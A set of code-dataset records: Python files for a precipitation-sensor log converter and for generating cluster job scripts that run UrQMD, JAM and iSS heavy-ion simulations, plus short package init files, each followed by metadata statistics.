jlieberherr/learning-pt-routing
|
2ffd5de83f3b8864dbafb39630265c4686eb3e0a
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from scripts.helpers.my_logging import init_logging
from scripts.helpers.project_params import TESTS_OUTPUT_FOLDER, TESTS_LOG_NAME
init_logging(TESTS_OUTPUT_FOLDER, TESTS_LOG_NAME)
| 28.125
| 78
| 0.817778
| 34
| 225
| 5.058824
| 0.588235
| 0.127907
| 0.209302
| 0.255814
| 0.337209
| 0.337209
| 0
| 0
| 0
| 0
| 0
| 0.004854
| 0.084444
| 225
| 7
| 79
| 32.142857
| 0.830097
| 0.168889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
fdb6a98e3be731ce87d12e45929c6f043f9dc3bc
| 23
|
py
|
Python
|
src/binding/pyct_icp/__init__.py
|
xiang-1208/ct_icp
|
42928e584c24595c49e147e2ea120f8cc31ec716
|
[
"MIT"
] | 123
|
2021-10-08T01:51:45.000Z
|
2022-03-31T08:55:15.000Z
|
src/binding/pyct_icp/__init__.py
|
ZuoJiaxing/ct_icp
|
1c371331aad833faec157c015fb8f72143019caa
|
[
"MIT"
] | 9
|
2021-10-19T07:25:46.000Z
|
2022-03-31T03:20:19.000Z
|
src/binding/pyct_icp/__init__.py
|
ZuoJiaxing/ct_icp
|
1c371331aad833faec157c015fb8f72143019caa
|
[
"MIT"
] | 23
|
2021-10-08T01:49:01.000Z
|
2022-03-24T15:35:07.000Z
|
from .pyct_icp import *
| 23
| 23
| 0.782609
| 4
| 23
| 4.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130435
| 23
| 1
| 23
| 23
| 0.85
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
fdd4b31a5e79a3bbd57126dc121b9a9eb32d2cbe
| 102
|
py
|
Python
|
autoc/__init__.py
|
jaentrouble/image
|
5a9cc256bb8452bed0195950576d2b1f479b48cc
|
[
"MIT"
] | null | null | null |
autoc/__init__.py
|
jaentrouble/image
|
5a9cc256bb8452bed0195950576d2b1f479b48cc
|
[
"MIT"
] | null | null | null |
autoc/__init__.py
|
jaentrouble/image
|
5a9cc256bb8452bed0195950576d2b1f479b48cc
|
[
"MIT"
] | null | null | null |
import autoc.worker
import autoc.alphago_RFC
import autoc.marker
import autoc.texts
import autoc.tools
| 20.4
| 24
| 0.862745
| 16
| 102
| 5.4375
| 0.5
| 0.632184
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 102
| 5
| 25
| 20.4
| 0.935484
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8bee176f47700fd77cd4816baaaa7b3ef324b720
| 16,367
|
py
|
Python
|
archive/parsivel_log_nc_convert.py
|
jdiasn/raincoat
|
b0249c88f1a5ca22a720285e87be4b06b67705b5
|
[
"MIT"
] | 1
|
2020-04-22T05:41:08.000Z
|
2020-04-22T05:41:08.000Z
|
archive/parsivel_log_nc_convert.py
|
jdiasn/raincoat
|
b0249c88f1a5ca22a720285e87be4b06b67705b5
|
[
"MIT"
] | null | null | null |
archive/parsivel_log_nc_convert.py
|
jdiasn/raincoat
|
b0249c88f1a5ca22a720285e87be4b06b67705b5
|
[
"MIT"
] | 4
|
2019-01-01T11:33:14.000Z
|
2021-01-04T20:34:43.000Z
|
import numpy as np
import datetime
import calendar
import matplotlib.mlab
matplotlib.use('Agg')
from netCDF4 import Dataset
import io
import collections
def time2unix(datestring):
try:
f = datetime.datetime.strptime(datestring,"%Y%m%d%H%M%S.%f")
unix = calendar.timegm(f.timetuple())
except ValueError:
unix = np.nan
return unix
def count_file_lines(fname, site):
if site == 'jue':
f = open(fname, 'r')
elif site == 'nya':
f = io.open(fname, 'r', encoding='ISO-8859-1')
line_total = sum(1 for line in f)
f.close()
return line_total
def readASCII_old(logfile): #valid for reading in .logs from Aug.2013 until April 17th,2015
#read .log-file:
dic = {}
colnames = ['unixtime',\
'rr','r_accum','wawa','z','vis','interval','amp','nmb','T_sensor',\
'serial_no','version',\
'curr_heating','volt_sensor',\
'status_sensor','station_name',\
'r_amount',\
'error_code',\
'n', 'v' ]
#0: datetime string, 1-9:float, 10,11:string, 12,13: float, 14,15: string, 16:float, 17:string
#check for bad lines to skip:
iline = 0
filelen = count_file_lines(logfile)
rowlen = 570. # default for files!
#set keys where strings will be put in, to string arrays:
for k,key in enumerate(colnames):
if k == 10 or k == 11 or k == 14 or k == 15 or k == 17:
dic[key] = np.empty(filelen,dtype = 'S20')
elif k == 18 or k == 19:
dic[key] = np.zeros([32,filelen])
else:
dic[key] = np.nan * np.ones(filelen)
#read file:
f = open(logfile,'r')
for line in f: # for each line split up string, put value into corresponding array if rowlen normal.
line = line.strip()
cols = line.split(';')
#1/0
for i,cname in enumerate(colnames):
if len(line) == rowlen:
if i == 0:
#datetime = cols[i]
dic[cname][iline] = time2unix(cols[i])
elif i == 10 or i == 11 or i == 14 or i == 15 or i == 17: #all columns containing strings
dic[cname][iline] = str(cols[i])
elif i == 18:
for aa in range(32):
dic[cname][aa,iline] = float(cols[i+aa])
if dic[cname][aa,iline] == -9.999 : dic[cname][aa,iline] = np.nan
elif i == 19:
for aa in range(32):
dic[cname][aa,iline] = float(cols[50+aa])
if dic[cname][aa,iline] == -9.999 : dic[cname][aa,iline] = np.nan
else: dic[cname][iline] = float(cols[i])
dic['rr'][:] = dic['rr'][:]*60. #convert from mm/min to mm/h
iline += 1
f.close()
return dic
################################################################################
##############################################################################
def readASCII(logfile, site): #valid for reading in .logs later than April 17th,2015
#read .log-file:
dic = {}
colnames = ['unixtime',\
'rr','r_accum','wawa','z','vis','interval','amp','nmb','T_sensor',\
'serial_no','version',\
'curr_heating','volt_sensor',\
'status_sensor','station_name',\
'r_amount',\
'error_code',\
'n', 'v',
'M']
#0: datetime string, 1-9:float, 10,11:string, 12,13: float, 14,15: string, 16:float, 17:string, 18,19: array(32,filelen), 20: array(32,32,filelen)
#check for bad lines to skip:
iline = 0
filelen = count_file_lines(logfile, site)
# if site == 'jue':
# if int(logfile[-12:-4]) > 20160625 :
# rowlen = 4662.0 # Station name JOYCE
# elif 20151016 < int(logfile[-12:-4]) and int(logfile[-12:-4]) < 20151020 :
# rowlen = 4665.
# elif 20151001 < int(logfile[-12:-4]) and int(logfile[-12:-4]) < 20151015 :
# rowlen = 4660.
# else:
# rowlen = 4666.0 # Station name Parsivel4
#
# elif site == 'nya':
# rowlen = 4660.0
#set keys where strings will be put in, to string arrays:
for k,key in enumerate(colnames):
if k == 10 or k == 11 or k == 14 or k == 15 or k == 17:
dic[key] = np.empty(filelen,dtype = 'S20')
elif k == 18 or k == 19:
dic[key] = np.zeros([32,filelen])
elif k == 20:
dic[key] = np.zeros([32,32,filelen])
else:
dic[key] = np.nan * np.ones(filelen)
#read file:
if site == 'jue':
f = open(logfile,'r')
elif site == 'nya':
f = io.open(logfile,'r', encoding='ISO-8859-1')
for line in f.readlines(): # for each line split up string, put value into corresponding array if rowlen normal.
line = line.strip()
cols = line.split(';')
if 20150917 < int(logfile[-12:-4]) and int(logfile[-12:-4]) < 20151017 :
cols = [s.replace('<', '') for s in cols]
cols = [s.replace('>', '') for s in cols]
#1/0
#print 'len(line)', len(line), rowlen, len(line) == rowlen, 'len(cols)', len(cols), len(cols) == 1107
for i,cname in enumerate(colnames): # loop through columns
#if len(line) == rowlen :# and cols[14] < 2: # check status of parsivel: if 0 or 1: sensor usable, if 2 or 3: not usable.
if 1 == 1:
try:
test = float(cols[0][0:4])
except: continue
if test < 2000: # time stamp missing or in the wrong place
continue
if len(cols) == 1106:
tempcols = collections.deque(cols)
tempcols.extendleft([cols[0][0:18]])
tempcols[1] = tempcols[1][18:-1]
cols = list(tempcols)
elif len(cols) != 1107:
continue
if i == 0:
dic[cname][iline] = time2unix(cols[i])
elif i == 10 or i == 11 or i == 14 or i == 15 or i == 17: #all columns containing strings
dic[cname][iline] = str(cols[i])
elif i == 18:
for aa in range(32):
try:
dic[cname][aa,iline] = float(cols[i+aa]) #cols 18 upto 49 (32 values)
except ValueError:
dic[cname][aa,iline] = np.nan
if dic[cname][aa,iline] == -9.999 : dic[cname][aa,iline] = np.nan
elif i == 19:
for aa in range(32):
try:
dic[cname][aa,iline] = float(cols[50+aa]) #cols 50 upto 81 (32 values)
except ValueError:
dic[cname][aa,iline] = np.nan
if dic[cname][aa,iline] == -9.999 : dic[cname][aa,iline] = np.nan
elif i == 20:
for bb in range(32): #loop through falling velocities, ie rows in matrix
for aa in range(32): #loop through sizes, ie columns
try:
dic[cname][aa,bb,iline] = float(cols[82+32*aa+bb])
if float(cols[82+32*aa+bb]) < 1000000: dic[cname][aa,bb,iline] = np.nan
except ValueError:
dic[cname][aa,bb,iline] = np.nan
else:
#if i == 1: 1/0
if len(cols) == 1107: # RG 5.8.2016: if some different lenght, something wrong with this line (e.g. time stamp missing)
try:
dic[cname][iline] = float(cols[i])
except ValueError:
dic[cname][iline] = np.nan
else :
dic[cname][iline] = np.nan
#if iline == 1: 1/0
iline += 1
f.close()
return dic
################################################################################################
################################################################################################
def writeNC_old(logfile,ncname): #valid for data Aug2013-Apr17,2015
#read .log-file into dictionnary:
data = readASCII_old(logfile)
#get number of lines in file ie length of data columns
filelen = len(data['unixtime'])
#open .nc outfile.
ncout = Dataset(ncname,'w',format='NETCDF4')
# define dimensions:
dim = ncout.createDimension('dim', filelen) #filelen, set='none' if unlimited dimension
ndim = ncout.createDimension('ndim',32)
stri = ncout.createDimension('stri',None)
#read variables:
time = ncout.createVariable('time','i8',('dim',)) #time in double-precision...
time.units = 'seconds since 1/1/1970 00:00:00'
time[:] = data['unixtime']
rain_rate = ncout.createVariable('rain_rate','f',('dim',))
rain_rate.units = 'mm/h'
rain_rate[:] = data['rr']
rain_accum = ncout.createVariable('rain_accum','f',('dim',))
rain_accum.units = 'mm'
rain_accum[:] = data['r_accum']
wawa = ncout.createVariable('wawa','f',('dim',))
wawa.units = 'weather code'
wawa[:] = data['wawa']
zeff = ncout.createVariable('Z','f',('dim',))
zeff.units = 'dB'
zeff[:] = data['z']
vis = ncout.createVariable('MOR_visibility','f',('dim',))
vis.units = 'm'
vis[:] = data['vis']
interval = ncout.createVariable('sample_interval','f',('dim',))
interval.units = 's'
interval[:] = data['interval']
ampli = ncout.createVariable('signal_amplitude','f',('dim',))
ampli.units = ''
ampli[:] = data['amp']
n_part = ncout.createVariable('n_particles','f',('dim',))
n_part.units = '#'
n_part.description = 'number of detected particles'
n_part[:] = data['nmb']
temp_sens = ncout.createVariable('T_sensor','f',('dim',))
temp_sens.units = 'deg C'
temp_sens[:] = data['T_sensor']
serial_no = ncout.createVariable('serial_no','S',('stri',))
serial_no[:] = data['serial_no']
version = ncout.createVariable('version','S',('stri',))
version.description = 'IOP firmware version'
version[:] = data['version']
curr_heating = ncout.createVariable('curr_heating','f',('dim',))
curr_heating.units = 'A'
curr_heating.description = 'Current heating system'
curr_heating[:] = data['curr_heating']
volt_sensor = ncout.createVariable('volt_sensor','f',('dim',))
volt_sensor.units = 'V'
volt_sensor.description = 'Power supply voltage in the sensor'
volt_sensor[:] = data['volt_sensor']
status_sensor = ncout.createVariable('status_sensor','S',('stri',))
status_sensor[:] = data['status_sensor']
station_name = ncout.createVariable('station_name','S',('stri',))
station_name[:] = data['station_name']
rain_am = ncout.createVariable('rain_am','f',('dim',))
rain_am.units = 'mm'
rain_am.description = 'rain amount absolute'
rain_am[:] = data['r_amount']
error_code = ncout.createVariable('error_code','S',('stri',))
error_code[:] = data['error_code']
N = ncout.createVariable('N','f',('ndim','dim'))
N.units = '1/m3'
N.description = 'mean volume equivalent diameter per preci class'
N[:,:] = data['n']
v = ncout.createVariable('v','f',('ndim','dim'))
v.units = 'm/s'
v.description = 'mean falling speed per preci class'
v[:,:] = data['v']
#close .nc-file:
ncout.close()
return
##################################################################################################
##################################################################################################
def writeNC(logfile,ncname, site):
#read .log-file into dictionnary:
data = readASCII(logfile, site)
#get number of lines in file ie length of data columns
filelen = len(data['unixtime'])
#open .nc outfile.
ncout = Dataset(ncname,'w',format='NETCDF4')
# define dimensions:
dim = ncout.createDimension('dim', filelen) #filelen, set='none' if unlimited dimension
ndim = ncout.createDimension('ndim',32)
stri = ncout.createDimension('stri',None)
#read variables:
time = ncout.createVariable('time','i8',('dim',)) #time in double-precision...
time.units = 'seconds since 1/1/1970 00:00:00'
time[:] = data['unixtime']
rain_rate = ncout.createVariable('rain_rate','f',('dim',))
rain_rate.units = 'mm/h'
rain_rate[:] = data['rr']
rain_accum = ncout.createVariable('rain_accum','f',('dim',))
rain_accum.units = 'mm'
rain_accum[:] = data['r_accum']
wawa = ncout.createVariable('wawa','f',('dim',))
wawa.units = 'weather code'
wawa[:] = data['wawa']
zeff = ncout.createVariable('Z','f',('dim',))
zeff.units = 'dB'
zeff[:] = data['z']
vis = ncout.createVariable('MOR_visibility','f',('dim',))
vis.units = 'm'
vis[:] = data['vis']
interval = ncout.createVariable('sample_interval','f',('dim',))
interval.units = 's'
interval[:] = data['interval']
ampli = ncout.createVariable('signal_amplitude','f',('dim',))
ampli.units = ''
ampli[:] = data['amp']
n_part = ncout.createVariable('n_particles','f',('dim',))
n_part.units = '#'
n_part.description = 'number of detected particles'
n_part[:] = data['nmb']
temp_sens = ncout.createVariable('T_sensor','f',('dim',))
temp_sens.units = 'deg C'
temp_sens[:] = data['T_sensor']
serial_no = ncout.createVariable('serial_no','S6',('stri',))
serial_no[:] = data['serial_no']
version = ncout.createVariable('version','S5',('stri',))
version.description = 'IOP firmware version'
version[:] = data['version']
curr_heating = ncout.createVariable('curr_heating','f',('dim',))
curr_heating.units = 'A'
curr_heating.description = 'Current heating system'
curr_heating[:] = data['curr_heating']
volt_sensor = ncout.createVariable('volt_sensor','f',('dim',))
volt_sensor.units = 'V'
volt_sensor.description = 'Power supply voltage in the sensor'
volt_sensor[:] = data['volt_sensor']
status_sensor = ncout.createVariable('status_sensor','S2',('stri',))
status_sensor[:] = data['status_sensor']
station_name = ncout.createVariable('station_name','S5',('stri',))
station_name[:] = data['station_name']
rain_am = ncout.createVariable('rain_am','f',('dim',))
rain_am.units = 'mm'
rain_am.description = 'rain amount absolute'
rain_am[:] = data['r_amount']
error_code = ncout.createVariable('error_code','S3',('stri',))
error_code[:] = data['error_code']
N = ncout.createVariable('N','f',('ndim','dim'))
N.units = '1/m3'
N.description = 'mean volume equivalent diameter per preci class'
N[:,:] = data['n']
v = ncout.createVariable('v','f',('ndim','dim'))
v.units = 'm/s'
v.description = 'mean falling velocity per preci class'
v[:,:] = data['v']
M = ncout.createVariable('M','f',('ndim','ndim','dim'))
M.units = ''
M.description = 'raw data matrix. number of particles per volume diameter and fall velocity'
M[:,:,:] = data['M']
#close .nc-file:
ncout.close()
return
| 32.997984
| 149
| 0.497892
| 1,888
| 16,367
| 4.241525
| 0.164725
| 0.097278
| 0.021229
| 0.026224
| 0.798576
| 0.76973
| 0.742882
| 0.705919
| 0.70467
| 0.693806
| 0
| 0.038852
| 0.320645
| 16,367
| 495
| 150
| 33.064646
| 0.681356
| 0.143765
| 0
| 0.749153
| 0
| 0
| 0.136686
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020339
| false
| 0
| 0.023729
| 0
| 0.064407
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
e353c5b2d062a86353d9f383614aa22cb103c78e
| 129
|
py
|
Python
|
shenfun/forms/__init__.py
|
spectralDNS/shenfun
|
956633aa0f1638db5ebdc497ff68a438aa22b932
|
[
"BSD-2-Clause"
] | 138
|
2017-06-17T13:30:27.000Z
|
2022-03-20T02:33:47.000Z
|
shenfun/forms/__init__.py
|
liqihao2000/shenfun
|
2164596ccf906242779d9ec361168246ee6214d8
|
[
"BSD-2-Clause"
] | 73
|
2017-05-16T06:53:04.000Z
|
2022-02-04T10:40:44.000Z
|
shenfun/forms/__init__.py
|
liqihao2000/shenfun
|
2164596ccf906242779d9ec361168246ee6214d8
|
[
"BSD-2-Clause"
] | 38
|
2018-01-31T14:37:01.000Z
|
2022-03-31T15:07:27.000Z
|
#pylint: disable=missing-docstring
from .project import *
from .inner import *
from .operators import *
from .arguments import *
| 21.5
| 34
| 0.767442
| 16
| 129
| 6.1875
| 0.625
| 0.30303
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.139535
| 129
| 5
| 35
| 25.8
| 0.891892
| 0.255814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8b6aff3ae21b13d384de66d9fedadc7af942756d
| 34,294
|
py
|
Python
|
ebe_scripts/generate_jobs.py
|
LipeiDu/hadronic_afterburner_toolkit
|
770cbd2582c988d3950e6707ceaeb7752212ac46
|
[
"MIT"
] | 3
|
2016-12-01T21:25:15.000Z
|
2021-08-17T19:57:37.000Z
|
ebe_scripts/generate_jobs.py
|
LipeiDu/hadronic_afterburner_toolkit
|
770cbd2582c988d3950e6707ceaeb7752212ac46
|
[
"MIT"
] | null | null | null |
ebe_scripts/generate_jobs.py
|
LipeiDu/hadronic_afterburner_toolkit
|
770cbd2582c988d3950e6707ceaeb7752212ac46
|
[
"MIT"
] | 4
|
2018-01-26T01:43:41.000Z
|
2020-10-21T19:01:27.000Z
|
#!/usr/bin/env python
import sys
from os import path, mkdir
import shutil
from glob import glob
import subprocess
import random
def write_script_header(cluster, script, event_id, walltime, working_folder):
if cluster == "nersc":
script.write(
"""#!/bin/bash -l
#SBATCH -p shared
#SBATCH -n 1
#SBATCH -J UrQMD_%s
#SBATCH -t %s
#SBATCH -L SCRATCH
#SBATCH -C haswell
""" % (event_id, walltime))
elif cluster == "guillimin":
script.write(
"""#!/usr/bin/env bash
#PBS -N UrQMD_%s
#PBS -l nodes=1:ppn=1
#PBS -l walltime=%s
#PBS -S /bin/bash
#PBS -e test.err
#PBS -o test.log
#PBS -A cqn-654-ad
#PBS -q sw
#PBS -d %s
""" % (event_id, walltime, working_folder))
elif cluster == "McGill":
script.write(
"""#!/usr/bin/env bash
#PBS -N UrQMD_%s
#PBS -l nodes=1:ppn=1:irulan
#PBS -l walltime=%s
#PBS -S /bin/bash
#PBS -e test.err
#PBS -o test.log
#PBS -d %s
""" % (event_id, walltime, working_folder))
else:
print("Error: unrecoginzed cluster name :", cluster)
print("Available options: nersc, guillimin, McGill")
exit(1)
def write_analysis_spectra_and_vn_commands(script, after_burner_type):
pid_particle_list = ['211', '-211', '321', '-321', '2212', '-2212',
'3122', '-3122', '3312', '-3312', '3334', '-3334',
'333']
charged_particle_list = ['9999', '9998', '-9998']
#pid_particle_list = []
#charged_particle_list = ['9999']
read_in_mode = 2
if after_burner_type == "JAM":
read_in_mode = 5
if after_burner_type == "OSCAR":
read_in_mode = 0
for ipart in charged_particle_list:
script.write(
"""
# charged hadrons
./hadronic_afterburner_tools.e run_mode=0 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 >> ../output.log
./hadronic_afterburner_tools.e run_mode=0 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 rap_min=-1.0 rap_max=-0.1 >> ../output.log
./hadronic_afterburner_tools.e run_mode=0 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 rap_min=0.1 rap_max=1.0 >> ../output.log
./hadronic_afterburner_tools.e run_mode=0 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 rap_min=0.5 rap_max=2.0 >> ../output.log
./hadronic_afterburner_tools.e run_mode=0 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 rap_min=-2.0 rap_max=-0.5 >> ../output.log
./hadronic_afterburner_tools.e run_mode=0 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 rap_min=-1.0 rap_max=1.0 compute_correlation=1 flag_charge_dependence=1 pT_min=0.2 pT_max=2.0 >> ../output.log
./hadronic_afterburner_tools.e run_mode=0 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 rap_min=-2.0 rap_max=2.0 compute_correlation=1 flag_charge_dependence=1 pT_min=0.2 pT_max=2.0 >> ../output.log
./hadronic_afterburner_tools.e run_mode=0 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 rap_min=-1.0 rap_max=1.0 >> ../output.log
./hadronic_afterburner_tools.e run_mode=0 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 rap_min=-2.0 rap_max=2.0 >> ../output.log
""".format(read_in_mode, ipart))
for ipart in pid_particle_list:
script.write(
"""
#./hadronic_afterburner_tools.e run_mode=0 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=1 rap_type=0 >> ../output.log
./hadronic_afterburner_tools.e run_mode=0 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=1 rap_type=1 >> ../output.log
""".format(read_in_mode, ipart))
def write_analysis_particle_distrubtion_commands(script, after_burner_type):
pid_particle_list = ['211', '-211', '321', '-321', '2212', '-2212',
'3122', '-3122']
charged_particle_list = ['9997', '-9997', '9998', '-9998']
read_in_mode = 2
if after_burner_type == "JAM":
read_in_mode = 5
if after_burner_type == "OSCAR":
read_in_mode = 0
for ipart in pid_particle_list:
script.write(
"""
./hadronic_afterburner_tools.e run_mode=2 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=1 rap_type=0 >> output.log
./hadronic_afterburner_tools.e run_mode=2 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=1 rap_type=1 >> output.log
""".format(read_in_mode, ipart))
if "-" not in ipart:
script.write(
"""
./hadronic_afterburner_tools.e run_mode=2 read_in_mode={0} particle_monval={1} distinguish_isospin=1 rap_type=0 net_particle_flag=1 >> output.log
./hadronic_afterburner_tools.e run_mode=2 read_in_mode={0} particle_monval={1} distinguish_isospin=1 rap_type=1 net_particle_flag=1 >> output.log
""".format(read_in_mode, ipart))
for ipart in charged_particle_list:
script.write(
"""
./hadronic_afterburner_tools.e run_mode=2 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 >> output.log
""".format(read_in_mode, ipart))
if "-" not in ipart:
script.write(
"""
./hadronic_afterburner_tools.e run_mode=2 read_in_mode={0} particle_monval={1} resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 net_particle_flag=1 >> output.log
""".format(read_in_mode, ipart))
script.write(
"""
./hadronic_afterburner_tools.e run_mode=2 read_in_mode={0} particle_monval=9999 resonance_feed_down_flag=0 distinguish_isospin=0 rap_type=0 >> output.log
""".format(read_in_mode))
def generate_script(cluster_name, folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '10:00:00'
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
mkdir UrQMD_results
for iev in `ls OSCAR_events`
do
cd osc2u
./osc2u.e < ../OSCAR_events/$iev
mv fort.14 ../urqmd/OSCAR.input
cd ../urqmd
./runqmd.sh
mv particle_list.dat ../UrQMD_results/particle_list_`echo $iev | cut -f 2 -d _`
cd ..
done
""")
script.close()
def generate_script_JAM(cluster_name, folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '10:00:00'
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/scratch/irulan/chun/JAM/JAM_lib/lib
mkdir JAM_results
for iev in `ls OSCAR_events`
do
eventid=`echo $iev | cut -f 2 -d "_" | cut -f 1 -d "."`
cd JAM
mv ../OSCAR_events/$iev ./OSCAR.DAT
rm -fr phase.dat
./jamgo
mv phase.dat ../JAM_results/particle_list_$eventid.dat
mv OSCAR.DAT ../OSCAR_events/OSCAR_$eventid.dat
cd ..
done
""")
script.close()
def generate_script_iSS(cluster_name, folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '35:00:00'
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
mkdir UrQMD_results
mkdir spvn_results
for iev in `ls hydro_events --color=none | grep "surface"`
do
event_id=`echo $iev | rev | cut -f 1 -d _ | rev | cut -f 1 -d .`
cd iSS
if [ -d "results" ]; then
rm -fr results
fi
mkdir results
mv ../hydro_events/$iev results/surface.dat
cp ../hydro_events/music_input_event_$event_id results/music_input
./iSS.e >> ../output.log
mv results/surface.dat ../hydro_events/$iev
#rm -fr results/sample*
# turn on global momentum conservation
./correct_momentum_conservation.py OSCAR.DAT
mv OSCAR_w_GMC.DAT OSCAR.DAT
cd ../osc2u
./osc2u.e < ../iSS/OSCAR.DAT >> ../output.log
mv fort.14 ../urqmd/OSCAR.input
cd ../urqmd
./runqmd.sh >> ../output.log
mv particle_list.dat ../UrQMD_results/particle_list_$event_id.dat
#mv ../iSS/OSCAR.DAT ../UrQMD_results/OSCAR_$event_id.dat
rm -fr ../iSS/OSCAR.DAT
rm -fr OSCAR.input
cd ..
./hadronic_afterburner_toolkit/convert_to_binary.e UrQMD_results/particle_list_$event_id.dat
rm -fr UrQMD_results/particle_list_$event_id.dat
cd hadronic_afterburner_toolkit
rm -fr results
mkdir results
mv ../UrQMD_results/particle_list_$event_id.gz results/particle_list.dat
""")
write_analysis_spectra_and_vn_commands(script, "UrQMD")
script.write(
"""
mv results/particle_list.dat ../UrQMD_results/particle_list_$event_id.gz
mv results ../spvn_results/event_$event_id
cd ..
done
""")
script.close()
def generate_script_iS(cluster_name, folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '3:00:00'
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
mkdir spvn_results
for iev in `ls hydro_events --color=none | grep "surface"`
do
event_id=`echo $iev | rev | cut -f 1 -d _ | rev | cut -f 1 -d .`
cd iS
if [ -d "results" ]; then
rm -fr results
fi
mkdir results
mv ../hydro_events/$iev results/surface.dat
cp ../hydro_events/music_input_event_$event_id results/music_input
./iS_withResonance.sh >> ../output.log
mv results/surface.dat ../hydro_events/$iev
mv results/ ../spvn_results/event_$event_id
cd ..
done
""")
script.close()
def generate_script_HBT(cluster_name, folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
event_id = working_folder.split('/')[-1]
walltime = '20:00:00'
script = open(path.join(working_folder, "submit_job.pbs"), "w")
write_script_header(cluster_name, script, event_id, walltime,
working_folder)
script.write(
"""
mkdir HBT_results
for iev in `ls UrQMD_events | grep "particle_list"`
do
eventid=`echo $iev | rev | cut -f 1 -d _ | rev | cut -f 1 -d .`
cd hadronic_afterburner_toolkit
rm -fr results
mkdir results
mv ../UrQMD_events/$iev results/particle_list.dat
mv ../UrQMD_events/mixed_event_$eventid.dat results/particle_list_mixed_event.dat
./hadronic_afterburner_tools.e read_in_mode=2 run_mode=1 resonance_feed_down_flag=0 > output.log
mv results/particle_list.dat ../UrQMD_events/$iev
mv results/particle_list_mixed_event.dat ../UrQMD_events/mixed_event_$eventid.dat
mv results ../HBT_results/event_$eventid
cd ..
done
""")
script.close()
def generate_script_HBT_with_JAM(cluster_name, folder_name):
working_folder = path.join(path.abspath('./'), folder_name)
